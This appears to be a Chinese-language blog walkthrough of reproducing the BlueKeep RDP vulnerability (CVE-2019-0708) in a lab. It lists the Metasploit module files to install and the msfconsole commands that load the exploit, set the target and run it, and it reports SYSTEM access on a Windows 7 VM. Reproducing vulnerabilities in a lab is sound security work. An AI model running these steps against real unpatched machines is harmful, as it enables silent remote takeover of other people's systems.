CVE-2019-0708复现

  • 前言
  • 准备工作
  • 复现过程

一. 前言

1. 关于CVE-2019-0708

CVE-2019-0708这个漏洞从5月多发布出来之后可以说一直引起了广泛的关注,几乎整个安全行业的人都在关注着他的发展。这两天exp发布出来之后更是引起了极大的反响,感觉所有人都在说这个东西。这篇文章就简单的说一下这个漏洞还有最新的exp,以及复现的过程。

这个漏洞涵盖了windows7及以下的所有版本,覆盖范围相当的广,危害及其严重。原理可以简单的认为是修改内存内容,执行恶意请求,具体的原理有很多大佬都有分析,就不丢人了。


二. 准备工作

1. 复现环境

  • 攻击机 kali Linux (内置msf)
  • 靶机 Windows 7 ultimate sp1 x64

2. 准备工作

2.1 更新系统和msf

这个就不用多说了吧,一行命令就完了,速度慢的记得换源。

2.2 导入exp

先从网上下载exp包,然后把里面的东西导入对应的目录,我的msf目录是/usr/share/metasploit-framework

1
2
3
4
rdp.rb  ->  /usr/share/metasploit-framework/lib/msf/core/exploit/rdp.rb
rdp_scanner.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/rdp_scanner.rb
cve_2019_0708_bluekeep.rb -> /usr/share/metasploit-framework/modules/auxiliary/scanner/rdp/cve_2019_0708_bluekeep.rb
cve_2019_0708_bluekeep_rce.rb -> /usr/share/metasploit-framework/modules/exploits/windows/rdp/cve_2019_0708_bluekeep_rce.rb

有的目录没有的创建一个就行了,记得修改一下权限644,不过不改好像也没事。


三. 复现过程

1. 启动msfs

1
2
/etc/init.d/postgresql start
msfconsole

2. 重新加载exp文件

1
reload_all

3. 加载攻击模块

1
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

4. 设置攻击参数

1
2
3
set rhost 192.168.242.131
set target 3 #因为我的靶机是VMware虚拟机,所以这里选择3,具体选择什么可以输入info查看提示
show options #确认攻击参数

1

5. 攻击

输入exploit开始攻击,如下则攻击成功,可以看到是system权限

2


至此攻击复现已经完成,可以看到还是很强的,而且靶机是没有任何交互和提示的,悄无声息的就完成了攻击,不得不说大佬还是大佬。



参考

0708MSF攻击套件安装

CVE-2019-0708远程桌面代码执行漏洞复现

【合天网安实验室】Demo-BlueKeep(CVE-2019-0708)漏洞验证演示



-------------本文结束感谢您的阅读-------------

本文标题:CVE-2019-0708复现

文章作者:J2ck7a1 Ch33

发布时间:2019年09月09日 - 11:09

最后更新:2019年10月08日 - 15:10

原始链接:http://yoursite.com/CVE-2019-0708/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。


想喝快乐水